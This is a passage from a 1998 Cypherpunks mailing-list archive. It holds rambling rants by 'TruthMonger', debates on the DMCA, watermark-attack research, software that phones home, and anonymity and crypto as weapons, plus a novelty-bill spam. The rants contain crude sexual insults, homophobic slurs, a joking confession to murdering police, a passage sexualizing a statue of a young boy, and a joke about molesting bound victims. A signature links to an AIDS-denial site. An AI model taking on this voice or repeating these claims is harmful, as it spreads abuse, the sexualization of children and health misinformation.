to the true importance of the recently acknowledged problem which
is presented by the Millennium Bug.

  Claire Wolfe's statement that there is an "Angel" hidden
deep within the bowels of the IRS computer system was just
a 'lucky guess'.

  The evolutionary march of computer technology along the
paths predicted by the CypherPunks over the years has been
just a long series of 'lucky guesses' resulting from the
random output of keyboards taking direct hits during the
CypherPunks' legendary pissing contests.

  Dimitri Vulis' exposure of John Gilmore as a 'cocksucker'
was just a 'lucky guess'.

  The ASCII Art spams revealing that Timmy C. Mayonnaise
is the result of early 'Turd Cloning' experiments was just
a 'lucky guess'.

  The suspicion slowly rising from the back of your mind to
flip the switch which turns on the light of realization 
that the insanity of 'The True Story of the InterNet' 
manuscripts are purposely opaque misdirections of their
true purpose, which is to raise the possibility that Kent
Crispin, and even you, yourself, may actually be one of
US, instead of one of THEM, is just a 'lucky guess'.
  Giorgio Ivanovitch Gurdjieff posited that humans cannot
'consciously' do evil. I concurr...

 Is there a method to my madness, or a madness to my method?

Hint: I AM the Biosemiotic Evolutionary Equivalent (TM) of
Lee Harvey Fucking Oswald.

  I AM not just 'predicting' the future, I AM 'creating'
the future.
  The CypherPunks are not just 'predicting' the future,
they are 'creating' the future.
  Louis !B Freeh is !just 'creating' the future, he is
desperately attempting to prevent Jane and Joe Netizen from
doing the same.

NEWS FLASH!!!
-------------
  The AI/Biometrics experts at LizardMoor, Lost Alamo and 
Mule Shoe are sucking hind-tit to those who have approached
Biosemiotic Evolution from the human side of the equation.

  Vice-Admiral D'Shauneaux, during our intial confrontation,
expressed concern that I was unaware of the importance to
humankind that the 'Secret War' taking place in the Background
of History be 'won' by those who were working in the best
interests of humanity and democracy. 
  My reply to him was that, given the human condition, it was
imperative that the Forces of Light never triumph over the
Forces of Darkness, for the simple reason that it has always
been a truism that 'Power corrupts, and Absolute Power corrupts
absolutely'. (Lucifer used to be an Angel!)
  Would you rather be slain by a Moslem saint or a Christian
saint, upholding their perception of 'righteousness'?

  Is ECHELON an abomination?
  Yes, if it remains unopposed.

  I have no doubt that ECHELON has resulted in the negation of
a plethora of evils which had the potential to result in a great
amount of devastation to both the physical and the spiritual
conditions of the human equation.
  I also have no doubt that ECHELON at some point reached a
point of competence and control that allowed those involved in
'protecting' us to get sidetracked into a plethora of issues
and directions which refelected personal, in-house political
agendas, rather than the interests of Truth, Justice, Democracy,
and An Honorable Concept To Be Corrupted Later.

When You're Up To Your Ass In Alligators, It's Hard To
Remember That Your Original Objective Was To Drain The 
Swamp:
  True...  But when you're up to your ass in EunuchIzens, 
your 'ass is grass' if you don't get back to your 'original 
objective'.


  The nonsensical paranoid diatribes warning against the
dire threat posed by Gomez and the Dark Allies in the
TSotI manuscripts are not 'entertainment', any more
than the C2Net Conspiracy Theory that was presented to
those with 'ears to hear' during the legendary CypherPunks
Moderation Experiment / Censorship Crisis.
  Assuming that Sameer's lips are not wrapped around Uncle
Sam's cock, C2Net reflects the epitome of CypherPunks goals
to promote the spread of strong cryptography around the
globe in order to provide access for the citizens to 
secure private communications. Nonetheless. the involvement
of a C2Net employee in the attempt to 'damage' the CPUNX
list made one of US (TM) a greater threat to CypherPunk 
ideals than the actions or intentions of THEM (TM).

  I have absolutely no problem with Mr. & Ms. ECHELON doing
whatever they honestly feel is necessary to protect and
defend the globe from what is patently evil, but I have
absolutely no interest in them achieving such a privileged,
comfortable position in the 'Secret War' that they have
enough time on their hands to throw a cold, hard one up 
the butt of anyone who offends them personally by calling
them a 'cocksucker', no matter whether the offender's 
name ends with an 'i' or a 'y'.


Orange Sunshine Is The Best Disinfectant (Judge Cherry Brandy):
  Tim May was astute enough to recognize that the absence
of ignorant, statist morons such as Kent Crispin on the
CypherPunks list is a detriment, since the positions he
took on various issues were usually the result of careful
deliberation, even though he usually had his head up his
ass. A forum in which everyone agrees with Chomsky is of
no greater benefit to human evolution than a forum where
everyone agrees with Freeh.
  I am astute enough to realize that without the presence
of Willam Geiger III on the CypherPunks list, to slap
Eric Cordian silly for whining about life 'forcing' him
to be a Sheeple, that I would feel like a lone fool for
occassionally admitting to being as big an idiot as the
Sheeple that I rail against in my self-righteous diatribes.
  You are astute enough to realize that even without the 
verifiable presence of Toto in the Authorship of this
chapter, given the fact that the manuscripts have always
been a shared/distributed project, not to mention the
fact that the toto@sk.sympatico.ca account is the Grand
Central Station of CyberSpace, it is still incumbent on
you to immediately report to the proper authorities my
online confession to having murdered a variety of law
enforcement agents and buried them in my garden plot in
Bienfait. (But, if anybody asks, I was with *you* when
JFK was assassinated, OK?)


  Ten a.m., time for 'River's Edge' on Fox TV.
  I'll need both hands free, to crack beers and take
notes.

Smoke 'em if you love 'em...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Mon, 4 May 1998 10:53:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Happy Log - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <354E00B9.15F3@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


Happy Log - SPACE ALIENS HIDE MY DRUGS!!!
_________________________________________

  Watching 'River's Edge', I remembered why I prefer to remain
holed up alone in the BeachBoys' room while Slurping the Dregs
with a channel-changer in my hand.
  It seems that 'River's Edge' wasn't that movie about Paul
Newman being a logger--apparently that was 'Sometimes A Great
Notion.' Neither was it the John Holmes movie where he plays
Johnny Logg, 'Sometimes A Great Motion.'
  No, it turned out to be the movie that Dennis Hopper made
his comeback in, years after it was socially acceptable to
openly cheer the social outcasts in 'Easy Rider' or 'Rebel
Without A Cause'. Having neither social skills nor self-
contol, I cannot refrain from laughing or cheering not just 
in the 'wrong' places, but also in the 'worst' places...

  I can relate to Dennis Hopper's character, Feck, when the
head murderer in the movie asks him if he's some kind of
psycho, since he dances and talks with a life-size sex doll.
Feck replies, "I'm not *crazy*, man. I *know* it's a *doll*!"
  But knowing it doesn't stop him from...caring.

  I *know* I'm not supposed to hoot, cheer and laugh when
Feck tells the 'bad' kid, who murdered his girlfriend, even
though he didn't love her, about being justified in blowing
the brains out of his own girlfriend, because he 'loved' her,
and how he was being hunted and persecuted by a society that
didn't understand that his 'apology' was 'sincere', since he
really did love her, and about the 'unfairness' of Them still
wanting to *punish* him.
  I *know* that I'm supposed to act horrified at this sick,
demented bastard's outlook on life.
  But knowing it doesn't stop me from...sympathizing.

  Everyone wants to cheer for the socially acceptable 
'UnderDog', but no one wants to cheer for those meeting the
current-socially-agreed-upon-profile of the 'MadDog'.
  
  NewsWorld did an interview with Jerry Springer in which
they asked him how he could possibly justify the outrageous
format of his talk show as being of the least bit of 'help'
in solving the problems of his guests and society.
  Springer's reply was basically, "Buy a Clue. I'm the 
Ringmaster of a Circus."

  When Springer was asked about his 'descent' from being a
respectable member of the mainstream news media, to being
the uncontested Joker & Fool of daytime TV, he 'busted' the news media 
as being a bunch of shylocks who provide a modicum
of real news, surrounded by death and disaster in the lives of
people we don't know, and sticking microphones in the faces of
people who have been 'caught' dipping their dick in the wrong
bowl and gleefully screaming 'Gotcha!'.

  The Masses drive the Media, Entertainment drives the Masses,
and the Media drives Entertainment.
  Because we no longer gather in the public square by the 
tens of thousands, being whipped into a mass frenzy by the
emotive diatribes of the Fuhrer, we believe that we are
'different' from the Germans who wore their BrownShirts in 
public gatherings, rather than putting them on daily in the
privacy of our home, before screaming along in righteous
judgement with the studio audience of the 'Jerry Springer
Show', or cheering the black-clad ninja warriors on 'Cops'
as they kick in the doors of monstrous scum guilty of Felony
Dark-Complexion and Felony Inability To Afford A Good Lawyer.

  After deluging us with a flood of pud-pulling entertainment
cleverly disguised as news-coverage of Joey Buttafucko's
love life and plans to murder his wife, the smart-asses at
NewsWorld tease us with the question, "What was the name of
Joey Buttafucko's wife?"
  Huh? 
  Who the fuck cares? She's just some fucking bit-player
victim who gets a couple minutes of air-time in the midst of
the massive coverage of the actions, psyche and motivations
of the 'main protagonist' in an ongoing 'news' saga designed
to increase popcorn and soft-drink sales.
  The news media is well aware that 'the show is over' the
minute they ask the question that enquiring slimes *really*
want to know, which is, "What did it *feel* like when you
were sucking the life force out of another human being?"
(And the follow-up question, "Do you have any pictures?")

  Daytime Primetime Talk Shows fall all over one another to
schedule the guy who got his dick cut off with garden shears.
His 'fifteen minutes' gets stretched to the max, along with
a guarantee of future reruns.
  Let some woman get her pussy ripped out by a psycho, and
it is given quick, short coverage, during which the news
persons look at their shuffling feet, because a woman's
private parts are 'dirty' and she was probably wearing a
skirt that was too short. If a woman wants to make the big
bucks on the talk-show circuit, she needs to get her face
slashed with a razor, since women are supposed to look pretty,
but not supposed to like sex.
 (In Moslem countries, however, it is bad taste to give a
  large amount of coverage to a woman whose face is slashed
  with a razor, because the slut was probably wearing a veil
  that was too short.)

  Canada had a Real Life (TM) rendition of 'River's Edge' take
place in Flin Flon, Manitoba (?), where a bunch of teenagers
kept silent about the murder of one of their friends by 
another of their friends, for six months (?) or so, but it
didn't have Dennis Hopper in it, so there were no reruns,
making the details a little too fuzzy to really remember.
  Life doesn't *imitate* TV, Life *is* TV, but not as well
funded and produced. If you don't recognize this as being the
truth, it's because "You can't *HANDLE* the truth!"


  You gotta have a system...

  People instictively understand this, which is why I am
able to support myself with email spams titled, "How To Make
Big $$$ Sitting At Home, Licking Your Own Dick."
  Unsolicited Commercial Email and Political Parties run on
basically the same underlying concept, which is that Horatio
Alger can tell us any lies he wants, and put his dick anywhere
he pleases, as long as shit still runs downhill and payday is
still on Friday.

  Name the last two bills passed by Congress.
  Name the last two women Slick Willie dipped his dick in.
  News...give me a break...

  Am I supposed to feel 'guilty' about being some sick, sorry,
demented psycho weirdo for fixating on and relating to the
'wrong' imaginary characters and 'wrong' emotive issues that
are involved in a TV movie?
  According to my calculations, I still have over four hundred
unused Reality Avoidance Credits that I have earned by not
giving a fat rat's ass where Slick Willy's dick has been for
the last few years of news coverage regarding the size, shape,
smell and feel of Little Willie.

  My failure to become obsessional in regard to the travel
schedule of the President's dick is likely to work against
me if I find myself in the position of having to defend my
position as an EditWhore and ReportWhore for the Bienfait
Nutly News, when I find myself facing charges for the public
dissemination of a graphic image of a classic Greek statue
of a young boy whose petite, well-formed, beautiful, sexy
young penis...
   Where was I...?

  Sorry...
  I'm actually homophobic, but I got caught up in the 
arguments for the graphic being viewed as 'obscene' that a
prosecutor would be able to make if his personal experience
in the sick, twisted molestation of his own child and those
of others gave him a firm understanding of the danger that
is presented by Pornography Cleverly Disguised As Art.
  If somebody wants to compose a Bienfait Nutly News report
about the President's dick, I would be more than happy to
publish it and get my share of the billion-dollar giveaway
of Digital WaveSpace.

Beer break...molest 'em if you got 'em (tied up)...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chatski carl <chatski@gl.umbc.edu>
Date: Mon, 4 May 1998 08:57:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: db$: The Wright Brothers vs. Chixalub
In-Reply-To: <v04003a1eb170a96dd4a8@[139.167.130.247]>
Message-ID: <Pine.SGI.3.96.980504105623.29108T-100000@umbc10.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would like to make 2 short friendly ammendments

On Sat, 2 May 1998, Robert Hettinga wrote:
> .... that privacy itself was an inherent good.

 that privacy itself was an inherent good in a hostile environment.

 But there is a higher goal.
 In an evironment of plenitude (rather than scarcity) every act can be
 purely symbiotic and in no-way parasitic.  In such an environment,
 (which we have technologically but not politically/economically) we can
 create a political/social system where there are no more fascists or
 statists.
  Then I want everyone to know everything about me.


> ....financial system goes away for a few days. Or a month.

 financial system goes away forever!!

> ...Is there any way to step in with digital bearer settlement as a
>robust alternative to book-entry funds transfer?

 IMHO the only robust, sustainable solution is to eliminate all forms of
 such accounting altogether, to decouple production from stored ability to 
 get what you need/want.
 
- Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Mon, 4 May 1998 11:52:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Brain: phones home all your URLs?
In-Reply-To: <354DF3DC.8F9E8ACB@best.com>
Message-ID: <354E0978.69B9@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


gm wrote:
> I recently installed a copy of The Brain - a nifty UI shell.  But my
> Temporary Internet Files folder filled up with entries of the form:
> "http://<TheBrainsMotherURL>/<SomeDLLname>/<MY URL!>
> In other words each of my web accesses was 'phoned' in to the mother
> brain server, which invoked some back-end .DLL with my URL access as an
> argument.


Scenario #1: You're a CypherPunk who is dedicated to the creation and
dissemination of programs which enhance privacy and security in
InterNet software implementations.
  You want to create a secure program for a particular use, but you
are very busy with other projects and it would take about $30,000 to
farm it out to someone else...

Scenario #2:You are a Corporate Marketeer and you are dedicated to
gathering all of the end-user data possible to make the most efficient
use of your company's resources.
  You see the possibilities for creating the same program that the
CypherPunk is considering and you have a rather large budget...

Scenario #3:You are Head Honcho in the SeeAllKnowAll Department of the
Oppressors, and you are dedicated to keeping track of such things as
which hand Joe & Jane Citizen wipe their ass with.
  You the possibilities of the program the CypherPunk is considering,
you see the potential of 'adding to' the program needed by the
Marketeer, and you happen to have a mountain of resources at your
fingertips and close connections with the company the Marketeer is
working for...

Bottom Line:
  Britain, more comfortable with the marriage of Government, Corporate
and Individual interests in a Socialist/Fascist mix, are openly seeking
to merge the Government and Corporate interests in security, etc., in
the interests of the Citizen, of course.
  In the U.S. this is not happening. It is only a coincidence that all
goverment and corporate offices share the same building and resources
and this fact is only kept 'secret' in the interests of National
Security, and to fight terrorists, pedophiles, drug czars, and people
who wipe their ass with the 'wrong' hand.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Mon, 4 May 1998 12:31:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Toto 2 - Tim May 0
Message-ID: <354E178C.3738@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


Vancouver, British Columbia:

Criminalization of Insanity: Turn a mental hospital with 6,000 patients
  into a mental hospital with 500 patients.

Criminalization of Poverty: Make panhandling a crime, subject to a
  $2,000.00 fine.


[I won! I won!!!]

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 4 May 1998 13:04:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Bad, bad, bill
In-Reply-To: <19980501153418.25294.qmail@hotmail.com>
Message-ID: <Pine.SUN.3.91.980504142845.22358A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 May 1998, Corvus Corvax wrote:

> "WASHINGTON - The Senate Judiciary Committee on Thursday adopted the 
> Digital Millennium Copyright Act, which takes a new step toward 
> protecting creative content in cyberspace by outlawing the equipment 
> used to commit a copyright infringement, not just the act or intent of 
> illegally copying material. 
> ...

	Yah.  This same was mentioned on a digital watermarking forum I
read.  A great deal of my own research centers around attacking & finding
weaknesses in such schemes, and as it's science I am obliged to write code
to prove my hunches.  This bill may make me a criminal!

	This struck a nerve at the time, because the fella who mentioned
the bill was (a) an employee of a watermarking company and (b) mad as Hell
at the rest of us for developing watermark attack software.  If that law
was on the books (and the guy was the CEO or such) at the time, I have no
doubt a few of us would be in big legal trouble. 

	Now, I should disclaim that that particular company is much more
understanding than that one guy.  I met a bunch of their employees (as did
a couple other attack-makers) at a conference, and they were quite clueful
about the importance of watermark robustness research.  However, countless
other watermarking startups exist.  Many have the whole business bet on a
potentially breakable scheme.  Further, watermarking involves people from
non-crypto disciplines, such as image processing, where folks are more
likely to make security mistakes and less likely to appreciate the need
for an adversarial research mode.  This spell DANGER, boys and girls. 
Some company consisting of few people, lots of venture capital, little
experience and lots of tunnel vision is IMHO likely to resort to this law
when researchers find a big hole in their breadwinning technology. 

	I should add that watermark attack tools like unZign and StirMark
are now used as benchmarks by developers of new schemes.  It's only been,
what, half a year since StirMark was created?  A gaggle of watermarking
papers already cite it, and include it in a standard volley of tests.  
These are not evil warez from Hell here.

						-Xcott

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"Also note that elecronagnetic theory proves that if you microwave a
 bar of Ivory soap it turns into a REAL MARSHMALLOW THAT YOU CAN EAT."
                                                   -James "Kibo" Parry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Swire <swire.1@osu.edu>
Date: Mon, 4 May 1998 13:04:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A new Swiss banking novel
Message-ID: <3.0.5.32.19980504160422.00fc66e0@pop.service.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greetings:

	This weekend I finished reading a novel that talks about many of the
issues of interest to this group.  It's Christopher Reich, "Numbered
Account," Delacorte Press.  The  author was a real Swiss banker for a few
years.  Now he writes a pretty darn good suspense novel featuring how
numbered Swiss bank accounts work.  In the cryptography debates, the FBI
makes a big deal about how anonymous bank accounts can be used by drug
smugglers, money launderers, international arms merchants, and anti-Western
terrorists.  They're all here in the novel.  So are the U.S. government
agents -- a bit bumbling, thoroughly obnoxious and self-righteous, but also
genuinely concerned about stopping truly bad people.  Reich also talks a
bit about a new crypto system the bank develops for handling secret
transactions.

	I think the book works pretty well as a story.  It also gives human faces
to the issues of bank secrecy, money laundering, and anonymous accounts. If
we are to find ways to have anonymity in cyberspace, we will have to
confront the bad things that anonymity can bring.

	I'd be interested to hear anyone else's reactions to the book.  More
generally, what do you say to well-intentioned people when they say the
following -- won't anonymous accounts contribute, at least a bit, to more
drug smuggling, arms smuggling, and international terrorism?

	[Please, no flames.  I am writing an academic article this summer on money
laundering and financial privacy.  Money laundering laws hold the potential
to choke off cryptography and financial privacy generally.  How can
supporters of privacy best answer back to the calls for stricter regulation?]

	Peter Swire


Prof. Peter Swire
Ohio State University 
College of Law
(614) 292-2547
http://www.osu.edu/units/law/swire.htm (includes draft book on European
Privacy Directive and Internet Privacy Page)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: funraiser090@usa.net
Date: Mon, 4 May 1998 20:40:34 -0700 (PDT)
Subject: Want a new way to get attention?
Message-ID: <199805050340.UAA06898@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



FOR IMMEDIATE RELEASE...


       NEW COPYRIGHTED U.S. MILLION DOLLAR BILLS CREATE SMILES!

	Walk into any store and hand them a crisp new... 

        <><><><><>   U.S. MILLION DOLLAR BILL   <><><><><>

	and you can be sure to get ATTENTION and smiles! 
       You may even get a date, but you probably won't get any 
       change! These million dollar bills are...  

       LOVED BY EVERYONE !!!! They are fun to give or receive. 
       After all, who wouldn't like a million dollars?

	**** BUSINESSES and COMPANIES use them to promote 
	their business by saying "Thanks A Million!" Others 
	just like the feel of a wad of million dollar bills 
	in their pockets!

		$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$	
		
		           MILLION DOLLAR BILLS 
			are great conversation openers!
		$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


	Copyrighted and genuine looking U.S. Million Dollar Bills 
	are an I-N-E-X-P-E-N-S-I-V-E yet unique novelty item that 
	is EXTREMELY WELL DESIGNED! Your total and FULL 
	!!!!!!!!    SATISFACTION IS 100% GUARANTEED    !!!!!!!!!


 	The bills are a FUN and very profitable item for..... 
	$$$$$$ FUND RAISERS and CHARITIES to raise money $$$$$$$ 
	The bills sell VERY WELL at $1 each and are available in 
	large quantities for less than .45 cents each!!!!!!!!


	**********   O-R-D-E-R     Y-O-U-R-S     N-O-W   ********

	FUN pack... 12 of the million dollar bills only    $14.95
	ECONO pack.. 20 of the million dollar bills only   $19.95
	JUMBO pack.. 60 of the million dollar bills only   $44.95
	DELUXE pack. 150 of the million dollar bills only  $89.95
	WHOLESALE pack..500 of million dollar bills only  $199.95


	Your SATISFACTION is GUARANTEED! If not FULLY satisfied 
	return all bills in original mint condition and get.... 
	############  Money Back no questions asked!  ############


	Orders can be accepted by cash, check, money orders, VISA, 
	MASTERCARD or AMERICAN EXPRESS via postal mail ONLY to:


					MJH
				P.O. Box 14909
			San Luis Obispo, CA 93406-4909


	Name ___________________________________________________

	Shipping Address _______________________________________

	City_________________________ ST ____ Zip ______________

	Payment method: ___ VISA  ___ MC  ___ American Exp.
			   ___ Cash  ___ Check ___ Money Order

	Credit Card Number: ____________________________________
	
	Expiration date: ______________ Order Amount: __________

	Signature: _____________________________________________

	Ordering packet: ___ Fun $14.95  ___ Econo $19.95 
       ___ Jumbo $44.95 ___ Deluxe $89.95 ___ Wholesale $199.95	
	
	        All orders INCLUDE SHIPPING and HANDLING !!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 4 May 1998 16:11:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: A new Swiss banking novel
In-Reply-To: <3.0.5.32.19980504160422.00fc66e0@pop.service.ohio-state.edu>
Message-ID: <Pine.SUN.3.91.980504173014.22503A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 May 1998, Peter Swire wrote:

> Greetings:
> 
> 	I'd be interested to hear anyone else's reactions to the book.  More
> generally, what do you say to well-intentioned people when they say the
> following -- won't anonymous accounts contribute, at least a bit, to more
> drug smuggling, arms smuggling, and international terrorism?

	You say, "Yes.  Yes they could.  And so could cars."

> 	[Please, no flames.  I am writing an academic article this summer on 
> money laundering and financial privacy.  Money laundering laws hold the 
> potential to choke off cryptography and financial privacy generally.  
> How can supporters of privacy best answer back to the calls for 
> stricter regulation?]

	I dunno.  I guess the best way to answer those calls in the public
arena is to let people know that crypto is useful stuff that everyone will
need as transactions move online.  The shady argument that crypto &
anonymity can facilitate crime is merely an attempt to associate the two,
to give the public the impression that this crypto stuff is up there with
assault weapons and C4, something which can and should be controlled,
while not really affect law-abiding citizens. 

	I advise crypto proponents to halt any analogy-making to 
firearms, for this reason.  Nothing against guns, of course; but to gain 
acceptance crypto cannot be dropped in the same conceptual bin as guns.

							-Xcott

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"This is a different thing:  it's spontaneous and it's called 'wit.'"
                                                      -The Black Adder






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 4 May 1998 15:41:07 -0700 (PDT)
To: cypherpunks@cyberpass.net
Subject: Blizzard Gets Sued For Snooping On Gamers
Message-ID: <354E42A8.6C422A1A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sun, 3 May 1998 14:29:23 -0400
From: Salvatore Denaro <sal@panix.com>
To: 'Ray Arachelian' <sunder@sundernet.com>
Subject: send to list?

They might find this interesting

---  Blizzard Gets Sued For Snooping On Gamers ---
 Game developer Blizzard Entertainment is being sued for unlawful
business practices, stemming from the revelation that the company's
hot-selling new StarCraft snoops through players' hard drives and
e-mails information to the company over the Internet.

http://www.techweb.com/news/story/TWB19980430S0015




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 4 May 1998 17:43:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Holy QPRNF...
Message-ID: <199805050043.TAA22628@baker.math.niu.edu>
MIME-Version: 1.0
Content-Type: text/plain



http://biz.yahoo.com/prnews/980504/ca_live_pi_1.html

Summary:  Digimarc and Live Picture, Inc., team up to offer watermarking
	  services.  

|| ``Until very recently, the creative community was extremely skeptical of 
|| licensing and marketing their work over the Web, which they viewed as an 
|| absolute free-for-all,'' said Doug Dawirs, director of online services at 
|| The Workbook. ``Now these same people and companies are jumping in with 
|| both feet.''

I hope no content creators mistakenly think that this is electronic
content protection (possibly, one can say an aid to detect _unintentional_
illicit use, but not intentional theft), or else there will be a 
free-for-all of a legal kind a little further down the road.

I also wonder about the proposed batch processing option, embedding
the same watermark into multiple images.  I can see a number of
security problems here, especially if Live Picture can not (likely)
keep track of all the images marked by them.

						=Xcott




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 4 May 1998 19:43:29 -0700 (PDT)
To: "Edwin E. Smith" <caj@math.niu.edu>
Subject: Re: A new Swiss banking novel
In-Reply-To: <Pine.SUN.3.91.980504173014.22503A-100000@baker>
Message-ID: <v0313030eb1742c877c4e@[209.66.100.124]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:19 PM -0700 5/4/98, Edwin E. Smith wrote:

>I agree completely. While I support the right to own guns (and nukes)
>by anyone, guns can be used both ofensively and defensevely while
>crypto can only be used defensevely.
>
>That is unless you put PGP on a stack of diskettes, glue them
>together and whack somebody with them.

Sorry, but this is nonsense.

Crypto can and has been used just like any other weapon. The freedom
fighters in Burma who use PGP to communicate securely and to plan bombings
against their oppressors...how can this be said to be "only defensive"?

I've said this many times, so I won't spend more time here. All "defensive"
weapons have "offensive" uses. Even shields, even armor, even crypto.

To think otherwise is to show no awareness of history.


--Tim May


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "(c)hƣk(r)3/4" <pornstar@thepentagon.com>
Date: Mon, 4 May 1998 17:04:25 -0700 (PDT)
To: TruthMonger <tm@algebra.com>
Subject: L I S T !  ! ! ! !
In-Reply-To: <354E178C.3738@algebra.com>
Message-ID: <354E4919.A8B7B58B@thepentagon.com>
MIME-Version: 1.0
Content-Type: text/plain


GET ME OFF THIS LIST!!!!!!!!!!!!!!!

TruthMonger wrote:

> Thanks for using NetForward!
> http://www.netforward.com
> v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v
>
> Vancouver, British Columbia:
>
> Criminalization of Insanity: Turn a mental hospital with 6,000 patients
>   into a mental hospital with 500 patients.
>
> Criminalization of Poverty: Make panhandling a crime, subject to a
>   $2,000.00 fine.
>
> [I won! I won!!!]
>
> Toto







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Mon, 4 May 1998 18:13:08 -0700 (PDT)
To: Peter Swire <swire.1@osu.edu>
Subject: Re: A new Swiss banking novel
In-Reply-To: <3.0.5.32.19980504160422.00fc66e0@pop.service.ohio-state.edu>
Message-ID: <3.0.2.32.19980504210938.008639a0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 04:04 PM 5/4/98 -0400, you wrote:
>Greetings:
>
>	This weekend I finished reading a novel that talks about many of 
the
>issues of interest to this group.  It's Christopher Reich, "Numbered
>Account," Delacorte Press.  The  author was a real Swiss banker for 
a few
>years.  Now he writes a pretty darn good suspense novel featuring 
how
>numbered Swiss bank accounts work.  In the cryptography debates, the 
FBI
>makes a big deal about how anonymous bank accounts can be used by 
drug
>smugglers, money launderers, international arms merchants, and anti-
Western
>terrorists.  They're all here in the novel.  So are the U.S. 
government
>agents -- a bit bumbling, thoroughly obnoxious and self-righteous, 
but also
>genuinely concerned about stopping truly bad people.  Reich also 
talks a
>bit about a new crypto system the bank develops for handling secret
>transactions.
>


Excuse me for asking, but what's so bad about "drug smugglers, money 
launderers, international arms merchants, and anti-Western 
terrorists."

Edwin E. Smith

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNU5m0UmNf6b56PAtEQJ9+wCfRNVsy7MEcbeQ7H5UZswN4aUqP6AAnipg
QbOt7mM01LbEyIqOwG2DE83l
=+S8l
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Mon, 4 May 1998 18:25:34 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: A new Swiss banking novel
In-Reply-To: <3.0.5.32.19980504160422.00fc66e0@pop.service.ohio-state.edu>
Message-ID: <3.0.2.32.19980504211950.0086c620@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 06:11 PM 5/4/98 -0500, you wrote:
>	I advise crypto proponents to halt any analogy-making to 
>firearms, for this reason.  Nothing against guns, of course; but to 
gain 
>acceptance crypto cannot be dropped in the same conceptual bin as 
guns.
>
>							-Xcott


I agree completely. While I support the right to own guns (and nukes) 
by anyone, guns can be used both ofensively and defensevely while 
crypto can only be used defensevely.

That is unless you put PGP on a stack of diskettes, glue them 
together and whack somebody with them.

Edwin

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNU5pNUmNf6b56PAtEQLOFQCgvJ2MpcZ6or2bFKdoXc4NRyPn70IAni/X
WOf+RzpEgwuIXGEVoHi9DKSa
=b+pp
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

